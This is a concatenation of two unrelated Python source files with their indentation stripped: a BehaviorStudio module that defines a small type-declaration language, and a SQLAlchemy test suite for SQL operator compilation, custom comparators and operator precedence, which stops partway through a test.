# coding=utf-8
# -----------------
# file : __init__.py
# date : 2012/11/03
# author : Victor Zarubkin
# contact : [email protected]
# copyright : Copyright (C) 2012 Victor Zarubkin
# license : This file is part of BehaviorStudio.
# :
# : BehaviorStudio is free software: you can redistribute it and/or modify
# : it under the terms of the GNU General Public License as published by
# : the Free Software Foundation, either version 3 of the License, or
# : (at your option) any later version.
# :
# : BehaviorStudio is distributed in the hope that it will be useful,
# : but WITHOUT ANY WARRANTY; without even the implied warranty of
# : MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# : GNU General Public License for more details.
# :
# : You should have received a copy of the GNU General Public License
# : along with BehaviorStudio. If not, see <http://www.gnu.org/licenses/>.
# :
# : A copy of the GNU General Public License can be found in file COPYING.
############################################################################
__author__ = 'Victor Zarubkin'
__copyright__ = 'Copyright (C) 2012 Victor Zarubkin'
__credits__ = ['Victor Zarubkin']
__license__ = ['GPLv3']
__version__ = '1.0.0' # this is last application version when this script file was changed
__email__ = '[email protected]'
|
# this thing still needs some refining
from base import Constant, StructType
Ref = StructType(u"ref:name")
## appear only in Field.spec
List = StructType(u"list:spec")
String = Constant(u"string")
Buffer = Constant(u"buffer")
## Appears only in Struct.fields
Object = StructType(u"object:name:spec")
StructDecl = StructType(u"struct:name:objects")
GroupDecl = StructType(u"group:name:members")
ConstDecl = StructType(u"constant:name")
Language = StructType(u"language:name:types")
language = Language(u'language', [
StructDecl(u"ref", [
Object(u"name", [String])
]),
StructDecl(u"list", [
Object(u"spec", [List([Ref(u"ref")])])
]),
ConstDecl(u"string"),
ConstDecl(u"buffer"),
StructDecl(u"object", [
Object(u"name", [String]),
Object(u"spec", [List([Ref(u"string"), Ref(u"buffer"), Ref(u"list"), Ref(u"ref")])]),
]),
StructDecl(u"struct", [
Object(u"name", [String]),
Object(u"objects", [List([Ref(u"object")])])
]),
StructDecl(u"group", [
Object(u"name", [String]),
Object(u"members", [List([Ref(u"ref")])])
]),
StructDecl(u"constant", [
Object(u"name", [String]),
]),
StructDecl(u"language", [
Object(u"name", [String]),
Object(u"types", [List([Ref(u"constant"), Ref(u"group"), Ref(u"struct")])]),
]),
])
class Synthetizer(object):
def __init__(self, language):
self.table = {}
for obj in language.types:
if obj.type == StructDecl:
uid = obj.name + u':' + u':'.join(_obj.name for _obj in obj.objects)
self.table[obj.name] = StructType(uid)
elif obj.type == ConstDecl:
self.table[obj.name] = Constant(obj.name)
def __getitem__(self, name):
return self.table[name]
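# Minimal usage sketch (assumes the Constant/StructType helpers from `base`
# expose .type, .name and .objects as the definitions above imply):
#
#     synth = Synthetizer(language)
#     struct_type = synth[u'struct']    # StructType(u'struct:name:objects')
#     string_const = synth[u'string']   # Constant(u'string')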
|
from sqlalchemy.testing import fixtures, eq_, is_, is_not_
from sqlalchemy import testing
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.sql import column, desc, asc, literal, collate, null, \
true, false, any_, all_
from sqlalchemy.sql.expression import BinaryExpression, \
ClauseList, Grouping, \
UnaryExpression, select, union, func, tuple_
from sqlalchemy.sql import operators, table
import operator
from sqlalchemy import String, Integer, LargeBinary
from sqlalchemy import exc
from sqlalchemy.engine import default
from sqlalchemy.sql.elements import _literal_as_text
from sqlalchemy.schema import Column, Table, MetaData
from sqlalchemy.sql import compiler
from sqlalchemy.types import TypeEngine, TypeDecorator, UserDefinedType, \
Boolean, NullType, MatchType, Indexable, Concatenable, Array
from sqlalchemy.dialects import mysql, firebird, postgresql, oracle, \
sqlite, mssql
from sqlalchemy import util
import datetime
import collections
from sqlalchemy import text, literal_column
from sqlalchemy import and_, not_, between, or_
class LoopOperate(operators.ColumnOperators):
def operate(self, op, *other, **kwargs):
return op
class DefaultColumnComparatorTest(fixtures.TestBase):
def _do_scalar_test(self, operator, compare_to):
left = column('left')
assert left.comparator.operate(operator).compare(
compare_to(left)
)
self._loop_test(operator)
def _do_operate_test(self, operator, right=column('right')):
left = column('left')
assert left.comparator.operate(
operator,
right).compare(
BinaryExpression(
_literal_as_text(left),
_literal_as_text(right),
operator))
assert operator(
left,
right).compare(
BinaryExpression(
_literal_as_text(left),
_literal_as_text(right),
operator))
self._loop_test(operator, right)
def _loop_test(self, operator, *arg):
l = LoopOperate()
is_(
operator(l, *arg),
operator
)
def test_desc(self):
self._do_scalar_test(operators.desc_op, desc)
def test_asc(self):
self._do_scalar_test(operators.asc_op, asc)
def test_plus(self):
self._do_operate_test(operators.add)
def test_is_null(self):
self._do_operate_test(operators.is_, None)
def test_isnot_null(self):
self._do_operate_test(operators.isnot, None)
def test_is_null_const(self):
self._do_operate_test(operators.is_, null())
def test_is_true_const(self):
self._do_operate_test(operators.is_, true())
def test_is_false_const(self):
self._do_operate_test(operators.is_, false())
def test_equals_true(self):
self._do_operate_test(operators.eq, True)
def test_notequals_true(self):
self._do_operate_test(operators.ne, True)
def test_is_true(self):
self._do_operate_test(operators.is_, True)
def test_isnot_true(self):
self._do_operate_test(operators.isnot, True)
def test_is_false(self):
self._do_operate_test(operators.is_, False)
def test_isnot_false(self):
self._do_operate_test(operators.isnot, False)
def test_like(self):
self._do_operate_test(operators.like_op)
def test_notlike(self):
self._do_operate_test(operators.notlike_op)
def test_ilike(self):
self._do_operate_test(operators.ilike_op)
def test_notilike(self):
self._do_operate_test(operators.notilike_op)
def test_is(self):
self._do_operate_test(operators.is_)
def test_isnot(self):
self._do_operate_test(operators.isnot)
def test_no_getitem(self):
assert_raises_message(
NotImplementedError,
"Operator 'getitem' is not supported on this expression",
self._do_operate_test, operators.getitem
)
assert_raises_message(
NotImplementedError,
"Operator 'getitem' is not supported on this expression",
lambda: column('left')[3]
)
def test_in(self):
left = column('left')
assert left.comparator.operate(operators.in_op, [1, 2, 3]).compare(
BinaryExpression(
left,
Grouping(ClauseList(
literal(1), literal(2), literal(3)
)),
operators.in_op
)
)
self._loop_test(operators.in_op, [1, 2, 3])
def test_notin(self):
left = column('left')
assert left.comparator.operate(operators.notin_op, [1, 2, 3]).compare(
BinaryExpression(
left,
Grouping(ClauseList(
literal(1), literal(2), literal(3)
)),
operators.notin_op
)
)
self._loop_test(operators.notin_op, [1, 2, 3])
def test_in_no_accept_list_of_non_column_element(self):
left = column('left')
foo = ClauseList()
assert_raises_message(
exc.InvalidRequestError,
r"in_\(\) accepts either a list of expressions or a selectable:",
left.in_, [foo]
)
def test_in_no_accept_non_list_non_selectable(self):
left = column('left')
right = column('right')
assert_raises_message(
exc.InvalidRequestError,
r"in_\(\) accepts either a list of expressions or a selectable:",
left.in_, right
)
def test_in_no_accept_non_list_thing_with_getitem(self):
# test [ticket:2726]
class HasGetitem(String):
class comparator_factory(String.Comparator):
def __getitem__(self, value):
return value
left = column('left')
right = column('right', HasGetitem)
assert_raises_message(
exc.InvalidRequestError,
r"in_\(\) accepts either a list of expressions or a selectable:",
left.in_, right
)
def test_collate(self):
left = column('left')
right = "some collation"
left.comparator.operate(operators.collate, right).compare(
collate(left, right)
)
def test_concat(self):
self._do_operate_test(operators.concat_op)
def test_default_adapt(self):
class TypeOne(TypeEngine):
pass
class TypeTwo(TypeEngine):
pass
expr = column('x', TypeOne()) - column('y', TypeTwo())
is_(
expr.type._type_affinity, TypeOne
)
def test_concatenable_adapt(self):
class TypeOne(Concatenable, TypeEngine):
pass
class TypeTwo(Concatenable, TypeEngine):
pass
class TypeThree(TypeEngine):
pass
expr = column('x', TypeOne()) - column('y', TypeTwo())
is_(
expr.type._type_affinity, TypeOne
)
is_(
expr.operator, operator.sub
)
expr = column('x', TypeOne()) + column('y', TypeTwo())
is_(
expr.type._type_affinity, TypeOne
)
is_(
expr.operator, operators.concat_op
)
expr = column('x', TypeOne()) - column('y', TypeThree())
is_(
expr.type._type_affinity, TypeOne
)
is_(
expr.operator, operator.sub
)
expr = column('x', TypeOne()) + column('y', TypeThree())
is_(
expr.type._type_affinity, TypeOne
)
is_(
expr.operator, operator.add
)
class CustomUnaryOperatorTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
def _factorial_fixture(self):
class MyInteger(Integer):
class comparator_factory(Integer.Comparator):
def factorial(self):
return UnaryExpression(self.expr,
modifier=operators.custom_op("!"),
type_=MyInteger)
def factorial_prefix(self):
return UnaryExpression(self.expr,
operator=operators.custom_op("!!"),
type_=MyInteger)
def __invert__(self):
return UnaryExpression(self.expr,
operator=operators.custom_op("!!!"),
type_=MyInteger)
return MyInteger
def test_factorial(self):
col = column('somecol', self._factorial_fixture())
self.assert_compile(
col.factorial(),
"somecol !"
)
def test_double_factorial(self):
col = column('somecol', self._factorial_fixture())
self.assert_compile(
col.factorial().factorial(),
"somecol ! !"
)
def test_factorial_prefix(self):
col = column('somecol', self._factorial_fixture())
self.assert_compile(
col.factorial_prefix(),
"!! somecol"
)
def test_factorial_invert(self):
col = column('somecol', self._factorial_fixture())
self.assert_compile(
~col,
"!!! somecol"
)
def test_double_factorial_invert(self):
col = column('somecol', self._factorial_fixture())
self.assert_compile(
~(~col),
"!!! (!!! somecol)"
)
def test_unary_no_ops(self):
assert_raises_message(
exc.CompileError,
"Unary expression has no operator or modifier",
UnaryExpression(literal("x")).compile
)
def test_unary_both_ops(self):
assert_raises_message(
exc.CompileError,
"Unary expression does not support operator and "
"modifier simultaneously",
UnaryExpression(literal("x"),
operator=operators.custom_op("x"),
modifier=operators.custom_op("y")).compile
)
class _CustomComparatorTests(object):
def test_override_builtin(self):
c1 = Column('foo', self._add_override_factory())
self._assert_add_override(c1)
def test_column_proxy(self):
t = Table('t', MetaData(),
Column('foo', self._add_override_factory())
)
proxied = t.select().c.foo
self._assert_add_override(proxied)
self._assert_and_override(proxied)
def test_alias_proxy(self):
t = Table('t', MetaData(),
Column('foo', self._add_override_factory())
)
proxied = t.alias().c.foo
self._assert_add_override(proxied)
self._assert_and_override(proxied)
def test_binary_propagate(self):
c1 = Column('foo', self._add_override_factory())
self._assert_add_override(c1 - 6)
self._assert_and_override(c1 - 6)
def test_reverse_binary_propagate(self):
c1 = Column('foo', self._add_override_factory())
self._assert_add_override(6 - c1)
self._assert_and_override(6 - c1)
def test_binary_multi_propagate(self):
c1 = Column('foo', self._add_override_factory())
self._assert_add_override((c1 - 6) + 5)
self._assert_and_override((c1 - 6) + 5)
def test_no_boolean_propagate(self):
c1 = Column('foo', self._add_override_factory())
self._assert_not_add_override(c1 == 56)
self._assert_not_and_override(c1 == 56)
def _assert_and_override(self, expr):
assert (expr & text("5")).compare(
expr.op("goofy_and")(text("5"))
)
def _assert_add_override(self, expr):
assert (expr + 5).compare(
expr.op("goofy")(5)
)
def _assert_not_add_override(self, expr):
assert not (expr + 5).compare(
expr.op("goofy")(5)
)
def _assert_not_and_override(self, expr):
assert not (expr & text("5")).compare(
expr.op("goofy_and")(text("5"))
)
class CustomComparatorTest(_CustomComparatorTests, fixtures.TestBase):
def _add_override_factory(self):
class MyInteger(Integer):
class comparator_factory(TypeEngine.Comparator):
def __init__(self, expr):
super(MyInteger.comparator_factory, self).__init__(expr)
def __add__(self, other):
return self.expr.op("goofy")(other)
def __and__(self, other):
return self.expr.op("goofy_and")(other)
return MyInteger
class TypeDecoratorComparatorTest(_CustomComparatorTests, fixtures.TestBase):
def _add_override_factory(self):
class MyInteger(TypeDecorator):
impl = Integer
class comparator_factory(TypeDecorator.Comparator):
def __init__(self, expr):
super(MyInteger.comparator_factory, self).__init__(expr)
def __add__(self, other):
return self.expr.op("goofy")(other)
def __and__(self, other):
return self.expr.op("goofy_and")(other)
return MyInteger
class TypeDecoratorTypeDecoratorComparatorTest(
_CustomComparatorTests, fixtures.TestBase):
def _add_override_factory(self):
class MyIntegerOne(TypeDecorator):
impl = Integer
class comparator_factory(TypeDecorator.Comparator):
def __init__(self, expr):
super(MyIntegerOne.comparator_factory, self).__init__(expr)
def __add__(self, other):
return self.expr.op("goofy")(other)
def __and__(self, other):
return self.expr.op("goofy_and")(other)
class MyIntegerTwo(TypeDecorator):
impl = MyIntegerOne
return MyIntegerTwo
class TypeDecoratorWVariantComparatorTest(
_CustomComparatorTests,
fixtures.TestBase):
def _add_override_factory(self):
class SomeOtherInteger(Integer):
class comparator_factory(TypeEngine.Comparator):
def __init__(self, expr):
super(
SomeOtherInteger.comparator_factory,
self).__init__(expr)
def __add__(self, other):
return self.expr.op("not goofy")(other)
def __and__(self, other):
return self.expr.op("not goofy_and")(other)
class MyInteger(TypeDecorator):
impl = Integer
class comparator_factory(TypeDecorator.Comparator):
def __init__(self, expr):
super(MyInteger.comparator_factory, self).__init__(expr)
def __add__(self, other):
return self.expr.op("goofy")(other)
def __and__(self, other):
return self.expr.op("goofy_and")(other)
return MyInteger().with_variant(SomeOtherInteger, "mysql")
class CustomEmbeddedinTypeDecoratorTest(
_CustomComparatorTests,
fixtures.TestBase):
def _add_override_factory(self):
class MyInteger(Integer):
class comparator_factory(TypeEngine.Comparator):
def __init__(self, expr):
super(MyInteger.comparator_factory, self).__init__(expr)
def __add__(self, other):
return self.expr.op("goofy")(other)
def __and__(self, other):
return self.expr.op("goofy_and")(other)
class MyDecInteger(TypeDecorator):
impl = MyInteger
return MyDecInteger
class NewOperatorTest(_CustomComparatorTests, fixtures.TestBase):
def _add_override_factory(self):
class MyInteger(Integer):
class comparator_factory(TypeEngine.Comparator):
def __init__(self, expr):
super(MyInteger.comparator_factory, self).__init__(expr)
def foob(self, other):
return self.expr.op("foob")(other)
return MyInteger
def _assert_add_override(self, expr):
assert (expr.foob(5)).compare(
expr.op("foob")(5)
)
def _assert_not_add_override(self, expr):
assert not hasattr(expr, "foob")
def _assert_and_override(self, expr):
pass
def _assert_not_and_override(self, expr):
pass
class ExtensionOperatorTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
def test_contains(self):
class MyType(UserDefinedType):
class comparator_factory(UserDefinedType.Comparator):
def contains(self, other, **kw):
return self.op("->")(other)
self.assert_compile(
Column('x', MyType()).contains(5),
"x -> :x_1"
)
def test_getitem(self):
class MyType(UserDefinedType):
class comparator_factory(UserDefinedType.Comparator):
def __getitem__(self, index):
return self.op("->")(index)
self.assert_compile(
Column('x', MyType())[5],
"x -> :x_1"
)
def test_op_not_an_iterator(self):
# see [ticket:2726]
class MyType(UserDefinedType):
class comparator_factory(UserDefinedType.Comparator):
def __getitem__(self, index):
return self.op("->")(index)
col = Column('x', MyType())
assert not isinstance(col, collections.Iterable)
def test_lshift(self):
class MyType(UserDefinedType):
class comparator_factory(UserDefinedType.Comparator):
def __lshift__(self, other):
return self.op("->")(other)
self.assert_compile(
Column('x', MyType()) << 5,
"x -> :x_1"
)
def test_rshift(self):
class MyType(UserDefinedType):
class comparator_factory(UserDefinedType.Comparator):
def __rshift__(self, other):
return self.op("->")(other)
self.assert_compile(
Column('x', MyType()) >> 5,
"x -> :x_1"
)
class IndexableTest(fixtures.TestBase, testing.AssertsCompiledSQL):
def setUp(self):
class MyTypeCompiler(compiler.GenericTypeCompiler):
def visit_mytype(self, type, **kw):
return "MYTYPE"
def visit_myothertype(self, type, **kw):
return "MYOTHERTYPE"
class MyCompiler(compiler.SQLCompiler):
def visit_slice(self, element, **kw):
return "%s:%s" % (
self.process(element.start, **kw),
self.process(element.stop, **kw),
)
def visit_getitem_binary(self, binary, operator, **kw):
return "%s[%s]" % (
self.process(binary.left, **kw),
self.process(binary.right, **kw)
)
class MyDialect(default.DefaultDialect):
statement_compiler = MyCompiler
type_compiler = MyTypeCompiler
class MyType(Indexable, TypeEngine):
__visit_name__ = 'mytype'
def __init__(self, zero_indexes=False, dimensions=1):
if zero_indexes:
self.zero_indexes = zero_indexes
self.dimensions = dimensions
class Comparator(Indexable.Comparator):
def _setup_getitem(self, index):
if isinstance(index, slice):
return_type = self.type
elif self.type.dimensions is None or \
self.type.dimensions == 1:
return_type = Integer()
else:
adapt_kw = {'dimensions': self.type.dimensions - 1}
# this is also testing the behavior of adapt()
# that we can pass kw that override constructor kws.
# required a small change to util.constructor_copy().
return_type = self.type.adapt(
self.type.__class__, **adapt_kw)
return operators.getitem, index, return_type
comparator_factory = Comparator
self.MyType = MyType
self.__dialect__ = MyDialect()
def test_setup_getitem_w_dims(self):
"""test the behavior of the _setup_getitem() method given a simple
'dimensions' scheme - this is identical to postgresql.ARRAY."""
col = Column('x', self.MyType(dimensions=3))
is_(
col[5].type._type_affinity, self.MyType
)
eq_(
col[5].type.dimensions, 2
)
is_(
col[5][6].type._type_affinity, self.MyType
)
eq_(
col[5][6].type.dimensions, 1
)
is_(
col[5][6][7].type._type_affinity, Integer
)
def test_getindex_literal(self):
col = Column('x', self.MyType())
self.assert_compile(
col[5],
"x[:x_1]",
checkparams={'x_1': 5}
)
def test_getindex_sqlexpr(self):
col = Column('x', self.MyType())
col2 = Column('y', Integer())
self.assert_compile(
col[col2],
"x[y]",
checkparams={}
)
self.assert_compile(
col[col2 + 8],
"x[(y + :y_1)]",
checkparams={'y_1': 8}
)
def test_getslice_literal(self):
col = Column('x', self.MyType())
self.assert_compile(
col[5:6],
"x[:x_1::x_2]",
checkparams={'x_1': 5, 'x_2': 6}
)
def test_getslice_sqlexpr(self):
col = Column('x', self.MyType())
col2 = Column('y', Integer())
self.assert_compile(
col[col2:col2 + 5],
"x[y:y + :y_1]",
checkparams={'y_1': 5}
)
def test_getindex_literal_zeroind(self):
col = Column('x', self.MyType(zero_indexes=True))
self.assert_compile(
col[5],
"x[:x_1]",
checkparams={'x_1': 6}
)
def test_getindex_sqlexpr_zeroind(self):
col = Column('x', self.MyType(zero_indexes=True))
col2 = Column('y', Integer())
self.assert_compile(
col[col2],
"x[(y + :y_1)]",
checkparams={'y_1': 1}
)
self.assert_compile(
col[col2 + 8],
"x[(y + :y_1 + :param_1)]",
checkparams={'y_1': 8, 'param_1': 1}
)
def test_getslice_literal_zeroind(self):
col = Column('x', self.MyType(zero_indexes=True))
self.assert_compile(
col[5:6],
"x[:x_1::x_2]",
checkparams={'x_1': 6, 'x_2': 7}
)
def test_getslice_sqlexpr_zeroind(self):
col = Column('x', self.MyType(zero_indexes=True))
col2 = Column('y', Integer())
self.assert_compile(
col[col2:col2 + 5],
"x[y + :y_1:y + :y_2 + :param_1]",
checkparams={'y_1': 1, 'y_2': 5, 'param_1': 1}
)
def test_override_operators(self):
special_index_op = operators.custom_op('->')
class MyOtherType(Indexable, TypeEngine):
__visit_name__ = 'myothertype'
class Comparator(TypeEngine.Comparator):
def _adapt_expression(self, op, other_comparator):
return special_index_op, MyOtherType()
comparator_factory = Comparator
col = Column('x', MyOtherType())
self.assert_compile(
col[5],
"x -> :x_1",
checkparams={'x_1': 5}
)
class BooleanEvalTest(fixtures.TestBase, testing.AssertsCompiledSQL):
"""test standalone booleans being wrapped in an AsBoolean, as well
as true/false compilation."""
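    # With a native-boolean dialect the column renders bare ("WHERE x");
    # without native boolean support the compiler rewrites it as "x = 1"
    # (or "x = 0" when negated).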
def _dialect(self, native_boolean):
d = default.DefaultDialect()
d.supports_native_boolean = native_boolean
return d
def test_one(self):
c = column('x', Boolean)
self.assert_compile(
select([c]).where(c),
"SELECT x WHERE x",
dialect=self._dialect(True)
)
def test_two_a(self):
c = column('x', Boolean)
self.assert_compile(
select([c]).where(c),
"SELECT x WHERE x = 1",
dialect=self._dialect(False)
)
def test_two_b(self):
c = column('x', Boolean)
self.assert_compile(
select([c], whereclause=c),
"SELECT x WHERE x = 1",
dialect=self._dialect(False)
)
def test_three_a(self):
c = column('x', Boolean)
self.assert_compile(
select([c]).where(~c),
"SELECT x WHERE x = 0",
dialect=self._dialect(False)
)
def test_three_b(self):
c = column('x', Boolean)
self.assert_compile(
select([c], whereclause=~c),
"SELECT x WHERE x = 0",
dialect=self._dialect(False)
)
def test_four(self):
c = column('x', Boolean)
self.assert_compile(
select([c]).where(~c),
"SELECT x WHERE NOT x",
dialect=self._dialect(True)
)
def test_five_a(self):
c = column('x', Boolean)
self.assert_compile(
select([c]).having(c),
"SELECT x HAVING x = 1",
dialect=self._dialect(False)
)
def test_five_b(self):
c = column('x', Boolean)
self.assert_compile(
select([c], having=c),
"SELECT x HAVING x = 1",
dialect=self._dialect(False)
)
def test_six(self):
self.assert_compile(
or_(false(), true()),
"1 = 1",
dialect=self._dialect(False)
)
def test_eight(self):
self.assert_compile(
and_(false(), true()),
"false",
dialect=self._dialect(True)
)
def test_nine(self):
self.assert_compile(
and_(false(), true()),
"0 = 1",
dialect=self._dialect(False)
)
def test_ten(self):
c = column('x', Boolean)
self.assert_compile(
c == 1,
"x = :x_1",
dialect=self._dialect(False)
)
def test_eleven(self):
c = column('x', Boolean)
self.assert_compile(
c.is_(true()),
"x IS true",
dialect=self._dialect(True)
)
def test_twelve(self):
c = column('x', Boolean)
# I don't have a solution for this one yet,
# other than adding some heavy-handed conditionals
# into compiler
self.assert_compile(
c.is_(true()),
"x IS 1",
dialect=self._dialect(False)
)
class ConjunctionTest(fixtures.TestBase, testing.AssertsCompiledSQL):
"""test interaction of and_()/or_() with boolean , null constants
"""
__dialect__ = default.DefaultDialect(supports_native_boolean=True)
def test_one(self):
self.assert_compile(~and_(true()), "false")
def test_two(self):
self.assert_compile(or_(~and_(true())), "false")
def test_three(self):
self.assert_compile(or_(and_()), "")
def test_four(self):
x = column('x')
self.assert_compile(
and_(or_(x == 5), or_(x == 7)),
"x = :x_1 AND x = :x_2")
def test_five(self):
x = column("x")
self.assert_compile(
and_(true()._ifnone(None), x == 7),
"x = :x_1"
)
def test_six(self):
x = column("x")
self.assert_compile(or_(true(), x == 7), "true")
self.assert_compile(or_(x == 7, true()), "true")
self.assert_compile(~or_(x == 7, true()), "false")
def test_six_pt_five(self):
x = column("x")
self.assert_compile(select([x]).where(or_(x == 7, true())),
"SELECT x WHERE true")
self.assert_compile(
select(
[x]).where(
or_(
x == 7,
true())),
"SELECT x WHERE 1 = 1",
dialect=default.DefaultDialect(
supports_native_boolean=False))
def test_seven(self):
x = column("x")
self.assert_compile(
and_(true(), x == 7, true(), x == 9),
"x = :x_1 AND x = :x_2")
def test_eight(self):
x = column("x")
self.assert_compile(
or_(false(), x == 7, false(), x == 9),
"x = :x_1 OR x = :x_2")
def test_nine(self):
x = column("x")
self.assert_compile(
and_(x == 7, x == 9, false(), x == 5),
"false"
)
self.assert_compile(
~and_(x == 7, x == 9, false(), x == 5),
"true"
)
def test_ten(self):
self.assert_compile(
and_(None, None),
"NULL AND NULL"
)
def test_eleven(self):
x = column("x")
self.assert_compile(
select([x]).where(None).where(None),
"SELECT x WHERE NULL AND NULL"
)
def test_twelve(self):
x = column("x")
self.assert_compile(
select([x]).where(and_(None, None)),
"SELECT x WHERE NULL AND NULL"
)
def test_thirteen(self):
x = column("x")
self.assert_compile(
select([x]).where(~and_(None, None)),
"SELECT x WHERE NOT (NULL AND NULL)"
)
def test_fourteen(self):
x = column("x")
self.assert_compile(
select([x]).where(~null()),
"SELECT x WHERE NOT NULL"
)
def test_constant_non_singleton(self):
is_not_(null(), null())
is_not_(false(), false())
is_not_(true(), true())
def test_constant_render_distinct(self):
self.assert_compile(
select([null(), null()]),
"SELECT NULL AS anon_1, NULL AS anon_2"
)
self.assert_compile(
select([true(), true()]),
"SELECT true AS anon_1, true AS anon_2"
)
self.assert_compile(
select([false(), false()]),
"SELECT false AS anon_1, false AS anon_2"
)
def test_is_true_literal(self):
c = column('x', Boolean)
self.assert_compile(
c.is_(True),
"x IS true"
)
def test_is_false_literal(self):
c = column('x', Boolean)
self.assert_compile(
c.is_(False),
"x IS false"
)
def test_and_false_literal_leading(self):
self.assert_compile(
and_(False, True),
"false"
)
self.assert_compile(
and_(False, False),
"false"
)
def test_and_true_literal_leading(self):
self.assert_compile(
and_(True, True),
"true"
)
self.assert_compile(
and_(True, False),
"false"
)
def test_or_false_literal_leading(self):
self.assert_compile(
or_(False, True),
"true"
)
self.assert_compile(
or_(False, False),
"false"
)
def test_or_true_literal_leading(self):
self.assert_compile(
or_(True, True),
"true"
)
self.assert_compile(
or_(True, False),
"true"
)
class OperatorPrecedenceTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
column('name', String),
column('description', String),
)
table2 = table('op', column('field'))
def test_operator_precedence_1(self):
self.assert_compile(
self.table2.select((self.table2.c.field == 5) == None),
"SELECT op.field FROM op WHERE (op.field = :field_1) IS NULL")
def test_operator_precedence_2(self):
self.assert_compile(
self.table2.select(
(self.table2.c.field + 5) == self.table2.c.field),
"SELECT op.field FROM op WHERE op.field + :field_1 = op.field")
def test_operator_precedence_3(self):
self.assert_compile(
self.table2.select((self.table2.c.field + 5) * 6),
"SELECT op.field FROM op WHERE (op.field + :field_1) * :param_1")
def test_operator_precedence_4(self):
self.assert_compile(
self.table2.select(
(self.table2.c.field * 5) + 6),
"SELECT op.field FROM op WHERE op.field * :field_1 + :param_1")
def test_operator_precedence_5(self):
self.assert_compile(self.table2.select(
5 + self.table2.c.field.in_([5, 6])),
"SELECT op.field FROM op WHERE :param_1 + "
"(op.field IN (:field_1, :field_2))")
def test_operator_precedence_6(self):
self.assert_compile(self.table2.select(
(5 + self.table2.c.field).in_([5, 6])),
"SELECT op.field FROM op WHERE :field_1 + op.field "
"IN (:param_1, :param_2)")
def test_operator_precedence_7(self):
self.assert_compile(self.table2.select(
not_(and_(self.table2.c.field == 5,
self.table2.c.field == 7))),
"SELECT op.field FROM op WHERE NOT "
"(op.field = :field_1 AND op.field = :field_2)")
def test_operator_precedence_8(self):
self.assert_compile(
self.table2.select(
not_(
self.table2.c.field == 5)),
"SELECT op.field FROM op WHERE op.field != :field_1")
def test_operator_precedence_9(self):
self.assert_compile(self.table2.select(
not_(self.table2.c.field.between(5, 6))),
"SELECT op.field FROM op WHERE "
"op.field NOT BETWEEN :field_1 AND :field_2")
def test_operator_precedence_10(self):
self.assert_compile(
self.table2.select(
not_(
self.table2.c.field) == 5),
"SELECT op.field FROM op WHERE (NOT op.field) = :param_1")
def test_operator_precedence_11(self):
self.assert_compile(self.table2.select(
(self.table2.c.field == self.table2.c.field).
between(False, True)),
"SELECT op.field FROM op WHERE (op.field = op.field) "
"BETWEEN :param_1 AND :param_2")
def test_operator_precedence_12(self):
self.assert_compile(self.table2.select(
between((self.table2.c.field == self.table2.c.field),
False, True)),
"SELECT op.field FROM op WHERE (op.field = op.field) "
"BETWEEN :param_1 AND :param_2")
def test_operator_precedence_13(self):
self.assert_compile(
self.table2.select(
self.table2.c.field.match(
self.table2.c.field).is_(None)),
"SELECT op.field FROM op WHERE (op.field MATCH op.field) IS NULL")
def test_operator_precedence_collate_1(self):
self.assert_compile(
self.table1.c.name == literal('foo').collate('utf-8'),
"mytable.name = (:param_1 COLLATE utf-8)"
)
def test_operator_precedence_collate_2(self):
self.assert_compile(
(self.table1.c.name == literal('foo')).collate('utf-8'),
"mytable.name = :param_1 COLLATE utf-8"
)
def test_operator_precedence_collate_3(self):
self.assert_compile(
self.table1.c.name.collate('utf-8') == 'foo',
"(mytable.name COLLATE utf-8) = :param_1"
)
def test_operator_precedence_collate_4(self):
self.assert_compile(
and_(
(self.table1.c.name == literal('foo')).collate('utf-8'),
(self.table2.c.field == literal('bar')).collate('utf-8'),
),
"mytable.name = :param_1 COLLATE utf-8 "
"AND op.field = :param_2 COLLATE utf-8"
)
def test_operator_precedence_collate_5(self):
self.assert_compile(
select([self.table1.c.name]).order_by(
self.table1.c.name.collate('utf-8').desc()),
"SELECT mytable.name FROM mytable "
"ORDER BY mytable.name COLLATE utf-8 DESC"
)
def test_operator_precedence_collate_6(self):
self.assert_compile(
select([self.table1.c.name]).order_by(
self.table1.c.name.collate('utf-8').desc().nullslast()),
"SELECT mytable.name FROM mytable "
"ORDER BY mytable.name COLLATE utf-8 DESC NULLS LAST"
)
def test_operator_precedence_collate_7(self):
self.assert_compile(
select([self.table1.c.name]).order_by(
self.table1.c.name.collate('utf-8').asc()),
"SELECT mytable.name FROM mytable "
"ORDER BY mytable.name COLLATE utf-8 ASC"
)
def test_commutative_operators(self):
self.assert_compile(
literal("a") + literal("b") * literal("c"),
":param_1 || :param_2 * :param_3"
)
def test_op_operators(self):
self.assert_compile(
self.table1.select(self.table1.c.myid.op('hoho')(12) == 14),
"SELECT mytable.myid, mytable.name, mytable.description FROM "
"mytable WHERE (mytable.myid hoho :myid_1) = :param_1"
)
def test_op_operators_comma_precedence(self):
self.assert_compile(
func.foo(self.table1.c.myid.op('hoho')(12)),
"foo(mytable.myid hoho :myid_1)"
)
def test_op_operators_comparison_precedence(self):
self.assert_compile(
self.table1.c.myid.op('hoho')(12) == 5,
"(mytable.myid hoho :myid_1) = :param_1"
)
def test_op_operators_custom_precedence(self):
op1 = self.table1.c.myid.op('hoho', precedence=5)
op2 = op1(5).op('lala', precedence=4)(4)
op3 = op1(5).op('lala', precedence=6)(4)
self.assert_compile(op2, "mytable.myid hoho :myid_1 lala :param_1")
self.assert_compile(op3, "(mytable.myid hoho :myid_1) lala :param_1")
class OperatorAssociativityTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
def test_associativity_1(self):
f = column('f')
self.assert_compile(f - f, "f - f")
def test_associativity_2(self):
f = column('f')
self.assert_compile(f - f - f, "(f - f) - f")
def test_associativity_3(self):
f = column('f')
self.assert_compile((f - f) - f, "(f - f) - f")
def test_associativity_4(self):
f = column('f')
self.assert_compile((f - f).label('foo') - f, "(f - f) - f")
def test_associativity_5(self):
f = column('f')
self.assert_compile(f - (f - f), "f - (f - f)")
def test_associativity_6(self):
f = column('f')
self.assert_compile(f - (f - f).label('foo'), "f - (f - f)")
def test_associativity_7(self):
f = column('f')
        # because - has lower precedence than /
self.assert_compile(f / (f - f), "f / (f - f)")
def test_associativity_8(self):
f = column('f')
